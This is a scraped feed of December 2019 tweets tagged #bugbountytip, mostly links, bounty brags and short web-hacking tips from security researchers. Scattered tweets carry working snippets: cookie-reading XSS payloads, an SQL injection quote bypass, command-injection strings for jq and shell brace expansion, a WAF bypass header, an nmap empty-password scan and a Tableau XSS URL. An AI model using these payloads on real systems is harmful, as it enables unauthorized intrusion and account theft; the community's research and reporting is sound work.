2019-12-24 16:22:32
0 WEB CACHE POSITIONING HOST HEADER INJECTION by James Kettle @albinowax #bugbountytip #bugbountytips #bugbounty https://t.co/Lau7339zXG
Jinone
@jinonehk


2019-12-24 07:47:07
1 New Write-up About a dom xss From a private project 500$ https://t.co/oa4JnqhtwB Merry Christmas to you all ! Thanks @Hacker0x01 #TogetherWeHitHarder #BugBounty #bugbountytip
Ammar Amer๐Ÿ‡ธ๐Ÿ‡พ
@cry__pto


2019-12-24 07:40:18
3 Finding root accounts with an empty password in MySQL servers: nmap -p3306 --script mysql-empty-password xx.xx.xx.xx #Hacking #bugbountytip #Pentesting
Sayaan Alam
@ehsayaan


2019-12-24 02:32:45
0 Yay!!! Another 10k Awarded From TataCliq For Multiple Rate Limiting Issues!!! Great BB Program.. 2 More Triaged.. #bugbounty #bugbountytip #togetherwehitharder
Ricardo Freitas
@0x61737078


2019-12-24 02:11:26
0 RT @andripwn: RT @pwn0sec: Web cache poisoning attack https://t.co/6f6dxXBZTL #bugbounty #bugbountytip #bugbountytips #webcache_poisoning_attack
Ash
@m0rph1n3e


2019-12-23 23:15:55
0 is it possible to bypass the file extension in Local File Inclusion? URL Example: https://blahblahblah/?language=english which reads from english.html ( only html files ) #bugbounty #bugbountytip #bugbountytips #hacker0x01 #LFI
Security Executions Code
@pwn0sec


2019-12-23 20:58:18
0 File Path Traversal Using Burp-suite (Intruder) https://t.co/CmPakEgzfB #bugbountytip #bugbountytips #path_traversal #burpsuite #intruder
ghostlulz
@ghostlulz1337


2019-12-23 17:03:56
9 A Race Condition allowed one person to steal over $1,000,000 dollars from an ATM. If your curious how to detect these type of flaws check out my blog: https://t.co/jycSCNE9ms #BugBounty #bugbountytip #bugbountytips #infosec #redteam #osint #xss #pentest #appsec #DFIR https://t.co/DxXsgzyZ0Z
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-12-23 11:05:40
2 Top #pentesting and Bug Bounty Burp Extensions https://t.co/naoLUFqmPu #hackdoor #bugbounty #bugbountytip #bugbountytips #hacker #penetrationtesting #pentesting #devops #devsecops
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-12-23 11:03:19
4 Hardware Hacker Bee #hackdoor #bugbounty #bugbountytip #bugbountytips #hacker #penetrationtesting #pentesting #devops #devsecops https://t.co/KHAvODLYHa
แƒ’แƒแƒฉแƒ แƒแƒฅแƒ แƒแƒซแƒ” (Gocha Okradze)
@GochaOqradze


2019-12-22 21:40:06
1 #bugboutytips, #bugbountytip, #burp Detect file path traversal by Burp Suite intruder + regext https://t.co/T1xb4tCsLV via @YouTube
แƒ’แƒแƒฉแƒ แƒแƒฅแƒ แƒแƒซแƒ” (Gocha Okradze)
@GochaOqradze


2019-12-22 21:37:21
2 #bugbountytip, #bugbountytips, #burp, #xss Easy way detect easy reflect XSS. Easy Reflect XSS Burp Intruder https://t.co/oYRVhwD1VA via @YouTube
Ammar Amer๐Ÿ‡ธ๐Ÿ‡พ
@cry__pto


2019-12-22 16:49:04
0 Pentesting-Bible #hacking #pentest #redteam #OSINT #malware #CyberSecurity #ctf #bugbountytip it is just the beginning!๐Ÿ‘๐Ÿ˜Ž https://t.co/MmUnOQkJ7a
Andy Garcia
@GaelleTjat


2019-12-22 16:48:33
0 Great reading. #Infosec #Infosectips #bugbountytip https://t.co/NmloxT9KE3
Sunil
@Sunilkande1137


2019-12-22 14:33:19
0 Vimeo upload function SSRF by @dPhoeniixx https://t.co/DMIZfZoHJA #hacking #pentesting #bugbounty #recon #pentest #infosec #cybersecurity #itsecurity #websecurity #appsec #hacker #security #Hackers #Android #Androidhacking #bugbountytips #bugbountytip #hackerone #ssrf #hacking
เคˆเคถเคพเคจ เคธเคฟเค‚เคน
@R0X4R


2019-12-22 13:23:57
1 Filter bypass for xss in input tag. #bugbountytip #bugbounty #xss #hacking #happytosecure #bugbountycommunity #bugbountytips https://t.co/98c2ORAMwW
Karna
@karna__1


2019-12-22 13:08:46
0 Converted IP formats can be used to bypass blacklisted IP addresses while trying SSRFs. You just need to do 3 steps and you can convert formats at any time using your terminal. Happy Hunting! #bugbountytip #bugbountytips #infosec #AUTOMATION (2/2)
Ammar Amer๐Ÿ‡ธ๐Ÿ‡พ
@cry__pto


2019-12-22 08:56:42
1 -1-2000 articles as pdf files & 2000 links to advanced articles and resources about different fields of ethical hacking and programing -2-114 detailed osint tips: -how to gather info & why -useful tools https://t.co/xGKKQoPyyq #bugbountytip #Hacking #OSINT #Pentesting #redteam
Brodie Codie โ„ข
@brodie_codie


2019-12-22 07:31:56
0 Not a bad week, submitted 5 Cross-site scripting (XSS) vulnerability Reports... now the waiting game begins <a onmouseover="alert(document.cookie)">xxs link</a> "><img src=x onerror=alert(domain)> #bugbountytips #bugbountytip
เคˆเคถเคพเคจ เคธเคฟเค‚เคน
@R0X4R


2019-12-22 04:58:41
1 Filter bypass for xss in input tag. #bugbountytip #bugbounty #xss #hacking #happytosecure #bugbountycommunity #bugbountytips https://t.co/9vrKqD7lnY
Hendrik
@hendrikvb


2019-12-21 21:00:28
0 Obviously whatweb (@urbanadventur3r) will provide interesting results too! #bugbountytip https://t.co/z1uuPGsmcZ
ghostlulz
@ghostlulz1337


2019-12-21 13:04:48
4 ๐ŸŽ… MERRY CHRISTMAS ๐ŸŽ… If you'r looking for a good read over the holiday you should check out my Bug Bounty Book. Instead of spending money you could be making money๐Ÿ’ฐ https://t.co/zJFRZjg5q2 #BugBounty #bugbountytips #bugbountytip #osint #xss #appsec #dfir #redteam #hackers https://t.co/wWp4w7lmFM
drivertom
@drivertomtt


2019-12-21 12:13:30
0 How to defeat webshell scanners #bugbountytips #bugbountytip https://t.co/A79IMJYhtk
bug bounty tips - Retweet
@BugbountytipsR


2019-12-21 04:46:45
0 @iagox86 Tools - Padbuster Poracle Ciphers - CAST-cbc aes-128-cbc aes-192-cbc aes-256-cbc bf-cbc camellia-128-cbc camellia-192-cbc camellia-256-cbc cast-cbc cast5-cbc des-cbc des-ede-cbc des-ede3-cbc desx-cbc rc2-40-cbc rc2-64-cbc rc2-cbc seed-cbc #bugbountytip #bugbountytips 2/2
bug bounty tips - Retweet
@BugbountytipsR


2019-12-21 04:42:02
0 DECRYPT CIPHER WITHOUT THE KEY Padding Oracle Attack in Detail by Ron Bowes @iagox86 Explanation https://t.co/KWuU3SruSj An Example https://t.co/u0DcQnqa0o Encrypt data https://t.co/NnH2sXuoXT Practice https://t.co/xtgWVCO63p #Pastebin #bugbountytip #bugbountytips (1/2)
ghostlulz
@ghostlulz1337


2019-12-21 02:32:20
8 Wayback SQL Scanner - https://t.co/IcaV2mPjQV Swagger API - https://t.co/5toTZrRmdz New Robots.txt - https://t.co/IsyaPyECWG CSV Injection - https://t.co/loAf6mRXft XXE - https://t.co/vhpq7Bjg4d #BugBounty #bugbountytips #bugbountytip #infosec #osint #xss #appsec #hacking https://t.co/DGkhLNFata
Tarek Mohammed
@Conan0x3


2019-12-20 21:05:46
0 - Get a slack notification from "Monitorizer" about new sub-domains for a target - Found sub-domain for splunk enterprise - Search exploits for current version - Found CVE allow to disclose the server info along with product license key :D #bugbountytip #BugBounty https://t.co/fULk1BZbwP
Inon Shkedy
@InonShkedy


2019-12-20 01:50:06
2 Pentest for APIs? Leverage the predictable nature of REST APIs to find admin API endpoints! For example, if you saw the following API call: GET /api/v1/users/<id> Give it a chance, and change to DELETE / POST to create / delete users. #bugbountytip #bugbounty
Jesse Clark
@Hogarth45_ND


2019-12-19 23:12:22
1 On @Hacker0x01 use the Scope Version page to be ensured you are seeing the entire scope for program. Some times you can find several domains listed that are not reflected on the regular policy page. #bugbountytip https://t.co/9aHu40ON8I
Kenan
@h1_kenan


2019-12-19 21:59:09
0 It is time! https://t.co/oVgbVlEwQj #XSS #hacking #security #bugbountytip Please RT if you like. thanks
Yadhavi
@PrincessYadhavi


2019-12-19 18:44:19
2 "$HOME/bugbounty/paltform(ht,bugcrowd,etc)/program(verizonmedia)/target(yahoo)/target(com)(if scope has multiple TLDs)/date(dec-20)/tool(masscan)/filename (with toolname to easily identify)(yahoo.com-masscan.txt)" #bugbountytips #bugbounty #bugbountytip
Yadhavi
@PrincessYadhavi


2019-12-19 18:39:53
0 Use same directory structure on all of your systems.(windows, kali vm, vps). It'll save a lot of time. my directory structure for masscan on yahoo: "$HOME/bugbounty/h1/verzionmedia/yahoo/com/dec-20/masscan/yahoo.com-masscan.txt" #bugbountytips #bugbounty #bugbountytip
Apoorv Raj Saxena
@secxena


2019-12-19 16:02:04
1 I just published CredCheckโ€Šโ€”โ€ŠA credential Pentesting framework #bugbountytool #bugbounty #bugbountytip #Section144 https://t.co/zVlMCiIhpN
ak1t4 ๐Ÿ‡ฆ๐Ÿ‡ท
@akita_zen


2019-12-19 15:52:43
1 #bugbountytip: The Program always has the last word, Not the Triaging Analyst. Keep pushing until program security team ping you with a "clear" feedback. *Most of triagers/analyst prioritizes customers than bugbounty hunters , even when your report is valid. #bugbounty #infosec
Sebastian Wieseler
@kickino


2019-12-19 14:13:45
0 Second subdomain takeover within a few days. ๐Ÿฅณ๐Ÿฅณ The bugs are all around. Theyโ€™re just waiting for you to find them ๐Ÿ˜๐Ÿ˜ #bugbounty #bugbountytip #togetherwehitharder
Sanketh Sharath
@sharathsanketh


2019-12-19 13:38:04
3 After 6 months of bug hunting, i have taken a step back to pause and go back to reading and training (labs) this month. On reading again, I realised I didn't know shit about shit. Learning never ends. I really recommend newbies do this! #bugbounty #bugbountytips #bugbountytip
bug bounty tips - Retweet
@BugbountytipsR


2019-12-19 11:56:28
0 Parameter Pollution #bugbountytips #bugbountytip #bugbounty https://t.co/UolTrcx2q8
Fisher
@Regala_


2019-12-19 09:13:28
0 Actually, here's my top tip for writing a good report: you should be able to follow and reproduce the steps on YOUR own report after some time has passed #bugbounty #bugbountytip
d0nut
@d0nutptr


2019-12-19 01:03:37
0 @John08369305 @uraniumhacker @intigriti You might say โ€œthen teach them!โ€ Which I have more than most... but even the people Iโ€™ve spent hours on donโ€™t seem to โ€œget itโ€. Then they go around bringing others down with their misunderstandings. Just look at #bugbountytip . Like half of these are garbage.
mohsin khan
@mohsink83789226


2019-12-18 16:57:34
0 Please share web pentesting resources with me #bug #bugbountytips #bugbountytip #hacking #Hacker #bountyhunter #bounty
Rafin Rahman Chy
@rafinrahmanchy


2019-12-18 14:06:23
6 Required Skills for Facebook Bug Bounty *Web App Pentesting *Facebook API *graphQL *Burp Suite *Studying PoCs #BugBounty #bugbountytip #bugbountytips #EthicalHacker #EthicalHacking #Hacking #Hacker #Hackers #InfoSec #Infosecurity #ITsecurity #ITSec #netsec #appsec #websecurity https://t.co/AprGSWj64P
0x8hany
@Haniawad


2019-12-18 02:25:10
5 As @zseano always saying lazy developer reuse the code :) #BugBounty #bugbountytip https://t.co/NKfPRcd5f0
ghostlulz
@ghostlulz1337


2019-12-17 21:27:13
7 SQL injection is one of the most popular vulnerabilities out there yet there seems to be a lack of people who can identify this flaw in an applications source code. More info on by blog: https://t.co/m5K3yzo6iU #BugBounty #bugbountytip #bugbountytips #infosec #xss #sqli #osint https://t.co/BeKWOSmNpY
Fisher
@Regala_


2019-12-17 15:31:24
2 Flexing of the day ๐Ÿ˜‡ (impact took a beating) If you need help/tips -> reply below with SPECIFIC questions other than where to start, how to get crit, etc #bugbountytip https://t.co/GGpecf900H
Dhamu
@Dhamu_offi


2019-12-17 10:44:05
1 #bugbountytip #bugbounty Abusing feature to steal your tokens https://t.co/jN2AvQDQ7i
Rafin Rahman Chy
@rafinrahmanchy


2019-12-17 10:20:33
2 Best guideline to become a Web Application Security Researcher in my opinion https://t.co/uVslvJiX80 #EthicalHacking #EthicalHacker #Hacking #Hacker #WebSecurity #BugBounty #bugbountytip #bugbountytips #netsec #AppSec #InfoSec #ITsecurity #CyberSecurity #Pentesting #pentest
Dhamu
@Dhamu_offi


2019-12-17 10:17:30
7 #bugbountytip #bugbounty Hacking GitHub with Unicode's dotless 'I'. #Vulnerability: Password reset emails delฤฑvered to the wrong address. https://t.co/VKRlN2AxdH
Rafin Rahman Chy
@rafinrahmanchy


2019-12-17 09:33:35
5 Facebook Bug Bounty Resources by Philippe Harewood https://t.co/bpGdyUXc98 #Facebook #FB #BugBounty #bugbountytip #bugbountytips #EthicalHacking #EthicalHacker #Hacking #Hacker #Hackers #WhiteHat #WhiteHatHackers #AppSec #InfoSec #ITSecurity #CyberSecurity #Pentesting #Pentest https://t.co/hXoBqe1G5V
Avanish Pathak
@avanish46


2019-12-17 03:18:52
3 I earned $750 on @Bugcrowd . Capture the Account Creation Request On BurpSuite, Most of the case you'll find the redirect request in burp but not on the web : - [ https.//www.TARGET.com/account-created?redirectUrl=javascript:alert(document.cookie)// ] #bugbounty #bugbountytip https://t.co/Mxy2TieMIh
Ammar Amer๐Ÿ‡ธ๐Ÿ‡พ
@cry__pto


2019-12-17 00:38:05
7 113 #OSINT TIPS created by me and the number of tips will get higher every day until it reach 1000 tips. New Updates. https://t.co/gNMSDGULS6 #Hacking #PenTest #bugbountytips #redteam #CyberSecurity #infosec #bugbountytip
Tirtha Mandal
@tirtha_mandal


2019-12-16 23:01:04
1 First time I successfully reproduced HTTP Dsync attack on a bug bounty program. Thank you @synack @SynackRedTeam ๐Ÿคฉ๐Ÿ˜ #synack #srt #redteam #bugbountytip #httpdsync https://t.co/zlPjFgXbHS
Ben Tai
@ben_tby


2019-12-16 21:07:28
4 Just a few days before I was simultaneously celebrating my first and second reward, and today I'm proudly celebrating my third reward. Thank you, @Hacker0x01 #BugBounty #bugbountytip #Hacking https://t.co/CcftdtdQya https://t.co/aADPguvhzk
bugbountytip
@a_l_e_r_t_1_


2019-12-16 18:05:36
0 https://t.co/pjFDcvvJCX i'm newbie on bug bounty. When i working i'm streamming on twitch. Please check my channel and follow me ๐Ÿ˜‚. #bugbountytip #bugbounytips
Simpliv
@simplivllc


2019-12-16 16:00:07
1 This Self-paced Course Teaches You In Detail About [Ethical Hacking] Click Here To Sign Up #Hacking #Cybersecurity #bugbountytip #networking @StartGrowthHack @cry__pto @Pavandep8 @simplivllc https://t.co/6Q7g0olioK https://t.co/qEolSxBN7w
bug bounty tips - Retweet
@BugbountytipsR


2019-12-16 15:23:05
0 SQLi Without Quotes One of the BEST and SIMPLE BYPA$$ by @rodoassis username = \ password = INPUT2 SELECT * FROM login WHERE username = '{\' AND password = }'$INPUT2'; Part inside { } is considered as string https://t.co/mVDuuArf5Z #bugbountytips #bugbountytip
ghostlulz
@ghostlulz1337


2019-12-16 14:51:19
0 If you are serious about making a living doing bug bounties or working as a penetration tester you may want to get a copy of my latest book. ๐Ÿ’ฐHUGE KNOWLEDGE DROP ๐Ÿ’ฐ https://t.co/zJFRZjg5q2 #BugBounty #bugbountytip #bugbountytips #osint #infosec #redteam #hacking #pentest https://t.co/8tbkOCbFgM
Evgeny Larin
@godexmachine


2019-12-16 13:15:39
0 You can identify the Laravel framework by laravel_session cookie, then make a potential illegal request like POST, PUT, etc to check if debug mode is enabled. #BugBountyTip #BugBounty
TomNomNom
@TomNomNom


2019-12-16 11:00:27
9 If you need an element other than <a> for DOM Clobbering (i.e. one that returns an attribute value instead of '[Object HTMLElement]' when you call .toString() on it), you can use <area> with an href attribute #bugBountyTip https://t.co/YCSMhhPK61
noobSecurity
@noobsec_org


2019-12-16 07:17:12
6 https://t.co/7phSLNkWWL How we get $4000 in 5 minutes (Indonesian Language) #bugbounty #bugbountytip #bugbountytips #ittakesacrowd #togetherwehitharder
Laxmikant Bhumkar
@LuckyBhumkar


2019-12-16 00:09:51
0 Step by Step Bug Bounty by Nishant Saurav #bugbountytip https://t.co/0qTUn8I7Br
Elsadat โœช
@M0_SADAT


2019-12-15 00:38:20
3 I have submitted P1&P2 bugs more than 20 days and still no fix!! @santi_lopezz99 #bugbountytip PAY ME THEN DO THE DAMMN FIX! #bugbountylife #bugbounty #hacking #infosec
Max
@0xw2w


2019-12-14 23:01:10
2 @Hacker0x01 my.anotherdomain\@anotherdomain.com - 500 error my.anotherdomain^@anotherdomain.com - 302, accepted If you see that there are errors & your redirect not occurs but there are hints that this could work in particular cases, don't give up and continues fuzz! #bugbountytip #bugbounty
TheDelfX
@TheDelfX


2019-12-14 17:12:19
0 We are hackers. #hack #BugBounty #bugbountytip #software #hacking #hacker #hackerone https://t.co/29Q6mV643B
ghostlulz
@ghostlulz1337


2019-12-14 16:00:33
7 If you are serious about making a living doing bug bounties or working as a penetration tester you may want to get a copy of my latest book. ๐Ÿ’ฐHUGE KNOWLEDGE DROP ๐Ÿ’ฐ https://t.co/zJFRZjg5q2 #BugBounty #bugbountytip #bugbountytips #osint #infosec #redteam #hacking #pentest https://t.co/1TiV1v7Ipm
Nm Kannan ๐Ÿ‡ฎ๐Ÿ‡ณ
@cybrsadist


2019-12-14 14:28:33
2 Useful video for n00b bug hunters => https://t.co/KbiKnOA4mg by @InsiderPhD #bugbountytip #bugbounty #infosec #penetrationtesting
bug bounty tips - Retweet
@BugbountytipsR


2019-12-14 14:09:20
0 Gr8 Blind SQLi tips BUGH/*$$$$*/UNTER - Insert comment b/w string, if respond remain same then it is sqli Profile @gerben_javado WriteuP https://t.co/65svYcig2u Wonder Why @gerben_javado is not writing more blogs? #bugbountytip #bugbountytips
Sudoka
@sudo_sudoka


2019-12-14 08:05:24
1 Tableau Server #unauthenticated XSS, CVE-2019-19719, just visit: http://example[.]com/en/embeddedAuthRedirect.html?auth=javascript:alert("XSS") It's also an Open Redirect. #ThreatIntel #infosec #bugbounty #bugbountytip Let's search on Shodan: https://t.co/c4zhLFo9KK
แด‚
@pouyana1


2019-12-14 06:53:55
0 sometimes you can rely on 'Last-Modified' header to recognize software version, useful for finding available public exploits. #bugbountytips #bugbounty #bugbountytip
Shantanu Kulkarni
@shantanukul_


2019-12-14 06:35:01
7 6k hackerone disclosed reports at one place. https://t.co/3Dod4cwLHj #hacking #pentesting #bugbounty #recon #pentest #infosec #cybersecurity #itsecurity #websecurity #appsec #hacker #security #Hackers #Android #Androidhacking #bugbountytips #bugbountytip #hackerone #bugcrowd
แด‚
@pouyana1


2019-12-13 18:17:29
1 Use x-forwarded-for to bypass WAF ip based limitations. #bugbountytip #bugbounty #bugbountytips
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-12-13 04:06:34
0 Cross Site Request Forgery: Techniques https://t.co/3N7hAtbbFP #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #ceh #eccouncil #certification #training #cybersecuritytraining
Selim Enes Karaduman
@Enesdex


2019-12-12 18:55:51
0 Always check for location.hash and location.href if these js codes are going into any sink without encoding it's Dom XSS E.g var hash = location.href .....innerHTML = hash #bugbountytip #bugbountytips #BugBounty
Pflash Punk
@PflashPunk


2019-12-12 18:48:25
0 I just published SSRF via FFmpeg HLS processing https://t.co/NISu4rr8Ik #bugbounty #bugbountytips #bugbountytip
Halil AHMAD
@Halilahmadd


2019-12-12 18:06:10
0 After a nice stored xss I prepared my report.I hope everything will be fine. #BugBounty #BugBountyTip #Hackerone @Hacker0x01 @GoogleVRP https://t.co/gEmljQEZd9
/๐’…๐’†๐’—/๐’๐’–๐’๐’ ๅฐ้ขจ
@spyerror


2019-12-12 17:47:49
0 @Aksam funny, i think you are sleeping ๐Ÿ˜ด #BugBounty #BugBountyTip #WAF #infosec https://t.co/kExJ2STUK2
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-12-12 17:17:17
0 When the screens went black: How NotPetya taught Maersk to rely on resilience โ€“ not luck โ€“ to mitigate future cyber-attacks https://t.co/ECnt63vXqE #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #ceh #eccouncil
YogoshaOfficial
@YogoshaOfficial


2019-12-12 14:15:14
3 [#bugbountytip] Found staging application that give you access to a privilege account with default credz, make sure to reuse this domain cookies to the main domain (prod), you can easily access as privileged user. @TnMch_ & Get ready for #yogoshachristmaschallenge next monday !
bug bounty tips - Retweet
@BugbountytipsR


2019-12-12 13:56:24
0 TIP: IF you DON'T like the RESPOND of SERVER INTERCEPT RESPOND CHANGE IT use BURP Changed Respond to Bypass Auththentication by John Simon Profile https://t.co/m6mB5kZ7lh WriteuP https://t.co/K1SbMWjDfq #bugbountytip #bugbountytips #writeup #hacking
Zero Xyele
@zeroxyele


2019-12-12 11:59:11
0 I released new tool for extracting api keys and secrets. https://t.co/YqD2Cac6iy #bugbounty #bugbountytip #bugbountytips #hackerone #hacker101 #bugcrowd https://t.co/jzAuhGY7b8
Sunil
@Sunilkande1137


2019-12-12 06:16:33
1 Recon Resources https://t.co/W7NLDe4PNJ https://t.co/xj3JvFgojf https://t.co/Gx4sx1ZoPM https://t.co/gFAXmz3t34 #hacking #pentesting #bugbounty #recon #pentest #infosec #cybersecurity #ITsecurity #websecurity #appsec #hacker #security #Hackers #bugbountytips #bugbountytip
Mashoud1122
@mashoud1122


2019-12-12 04:17:01
1 Command exec in JQ cat file.json | jq .[;whoami;] returns error with command executed. #bugbountytip #bugbountytips #BugBounty #infosec #Security
Sunil
@Sunilkande1137


2019-12-12 01:25:04
4 6000 hackerone disclosed reports at one place. https://t.co/bxvXpnVitp #hacking #pentesting #bugbounty #recon #pentest #infosec #cybersecurity #itsecurity #websecurity #appsec #hacker #security #Hackers #Android #Androidhacking #bugbountytips #bugbountytip #hackerone
Vishnu Vardhan Gadupudi
@vishu10x00


2019-12-11 20:11:29
0 @idontkn85445458 @Dondata4 - As this is a post based you need to create a html csrf to trigger xss. - Just use burpsuite CSRF generator. - Save it as .html file. - Open the .html file it triggers XSS๐ŸŽ‰๏ธ #bugbountytip
Sunil
@Sunilkande1137


2019-12-11 19:13:07
3 6000 hackerone disclosed reports at one place. https://t.co/bxvXpnVitp #hacking #pentesting #bugbounty #recon #pentest #infosec #cybersecurity #itsecurity #websecurity #appsec #hacker #security #Hackers #Android #Androidhacking #bugbountytips #bugbountytip #hackerone
bug bounty tips - Retweet
@BugbountytipsR


2019-12-11 14:18:36
0 Use this link https://t.co/MWpV7kbFdO #bugbountytip #bugbountytips https://t.co/2suoUC9DK3
Tragger Osbourne๐Ÿง
@OsbourneTragger


2019-12-11 13:52:31
0 We all know @bishopfox is a team full of slayersBe sure to check out their latest write up where they identified 9 vulnerabilities in the Solishmed app #bugbounty #bugbountytip #bugbountytips #infosec #redteam #osint https://t.co/sNVecQJVRj
Vishnu Vardhan Gadupudi
@vishu10x00


2019-12-11 13:39:36
0 Escalate CRLF to RCE, I got this chain in my dreamsโ›ท๏ธ, i think it won't, at least not very often :P #bugbountytip CRLF -> X-HTTP-Method-overide:PUT -> Shell
bug bounty tips - Retweet
@BugbountytipsR


2019-12-11 12:56:47
1 XSS is like evil God who is everwhere Xss Hunter @AnasIsHere Xss Like Pro at https://t.co/a47iwf9j9f #bugbountytips #bugbounty #bugbountytip #hacking #writeup #xss
ghostlulz
@ghostlulz1337


2019-12-11 12:46:24
3 Everyone knows @bishopfox is a team full of slayers. Be sure to check out their latest write up where they identified 9 vulnerabilities in the Solishmed application. https://t.co/OtxduAPoSM #bugbounty #bugbountytip #bugbountytips #infosec #redteam #osint
D ฮž ฮž P ฮ› K โš™๏ธ
@Deepak_maxx


2019-12-11 12:43:40
0 If you got 10 stored XSS on the same application! How would you report it and why? I'm sure everyone will have their own opinions & experiences regarding this! #bugbounty #bugbountytips #bugbountytip
ZracheSs-AnasZ
@ZrariAnas


2019-12-11 08:12:03
0 If you didnโ€™t already subscribe to @spaceraccoonsec blog posts! Go now, do it.. Come on, donโ€™t question reason, just do it. Trust me, youโ€™ll like it. I love you and you love me, then go do it. Subscribe, itโ€™s free... No reason not to. Stop reading already!!??? #bugbountytip https://t.co/A7MeCBTLaA https://t.co/IGbatoBAAM
bug bounty tips - Retweet
@BugbountytipsR


2019-12-11 03:59:08
0 Beginners miss to chk source code for XSS and they never find out that it is easy #easy #bugbountytip #bugbountytips #hacking https://t.co/QM6gs3Ijpi
Sajjad Arshad
@sajjadium


2019-12-11 03:34:14
0 @USENIXSecurity @fransrosen @dawidczagan @orange_8361 @irsdl @garethheyes @NahamSec @ldionmarcil @nj_dav @jobertabma check out new ways of exploiting #WebCacheDeception using #PathConfusion techniques! #togetherwehitharder #bugbounty #bugbountytip #bugbountytips @Hacker0x01 @TheHackersNews
Ammar Amer๐Ÿ‡ธ๐Ÿ‡พ
@cry__pto


2019-12-10 17:34:59
5 -List of some Penetration Testing Tools.pdf: https://t.co/sN2lkjt1Uh -In Plain Sight:1: Vulnhub Walkthrough.pdf: https://t.co/F2zf4eJK6n -A cheat-sheet for password crackers.pdf https://t.co/XQQxCJ99wQ #bugbountytip #redteam #PenTest #Hacking #cybersecurity #BugBounty #OSINT
Mourad
@SecuAudit


2019-12-10 15:56:36
0 i reported a critical bug in a 3rd party website company confirmed that this is critical even if is out of scope ,HackerOne Staff despite this insists that this is not critical and updated the severity from Critical to Medium #750138 #BugBounty #bugbountytip @Hacker0x01 ๐Ÿ˜Ÿ
0day work
@0daywork


2019-12-10 15:53:28
1 #Bugbountytip Look for #API keys in the documentation or screenshots of blog posts. Sometimes those are *not* (entirely) redacted and still valid employee's credentials, giving you access to some juicy endpoints ;-) #Bugbounty #OWASP #ITSecurity https://t.co/V91tslWu3Y
Skyper ๐Ÿ’ป
@SkypLabs


2019-12-10 00:33:05
2 Get the #ASN of a company: https://t.co/pi8II54BuN #Security #Hacking #BugBounty #BugBountyTip #BugBountyTips #Shodan
Alessandro Brucato
@_brucedh


2019-12-09 17:17:36
0 Any idea how to trigger an XSS into the body of a 301 redirect? @s0md3v @uraniumhacker @iamnoooob @brutelogic #bugbountytip https://t.co/dmW1q4hwTv
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-12-09 16:21:04
4 ๐Ÿ†๐Ÿ†Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/4iR3cX3qyf
intigriti
@intigriti


2019-12-09 13:08:32
12 Did you know you can use OpenSSL for recon purposes? ๐Ÿ”’๐Ÿ˜ Thanks for the #BugBountyTip, @michael1026h1! https://t.co/mRraH8cK2z
Mohammed Shine
@MohammedShine8


2019-12-09 11:44:16
6 Got stuck with spaces in command Injection? Use {} to eliminate spaces while using commands. Eg: {ping,127.0.0.1} {ip,addr} {ls,-al} #bugbounty #bugbountytip #infosec #commandinjection #cmdi #vapt #hacker
dark_warlord14
@dark_warlord14


2019-12-09 11:42:17
1 Opened a web page on Firefox and left to get coffee. Came back in a minute to find that sweet XSS popup by @knoxss_me just lying there. @brutelogic will amaze you every time. #bugbountytip Try @knoxss_me sand save time looking for XSS manually. https://t.co/4ppKTLDCeN
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-12-09 08:47:33
0 ๐Ÿ’ฐKeep Following Us ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #ceh #eccouncil #certification #hackerone https://t.co/DwvuqYv30k
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-12-09 08:43:54
0 True Story When Hacking the Neighbourhood WiFi โ€” Tutorial Coming Soon ๐Ÿ’ฐ๐Ÿ’ฐ Keep Following Us ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops https://t.co/P5VyKxUU81
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-12-09 08:41:28
0 HOF Comming Soon ! Keep Following ! Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #ceh #eccouncil https://t.co/3GBqgjOgP4
robre
@_robre


2019-12-09 00:43:25
0 Create your own wordlists and be creative with them. If youโ€™re just using seclists like everyone else, you will only find what everyone else is finding. #bugbountytip #bugbountytips
Rafin Rahman Chy
@rafinrahmanchy


2019-12-08 18:15:45
3 Information Gathering Methodologies *Social Engineering *Doxing *OSINT *Advanced Google Search/Google Hacking *DNS Enumeration *Internet Archive *Dumpster Diving #CyberSecurity #InfoSec #EthicalHacking #EthicalHacker #Hacking #Hacker #Pentesting #Recon #BugBounty #bugbountytip https://t.co/bVcvwskY8a
Tragger Osbourne
@OsbourneTragger


2019-12-08 15:06:59
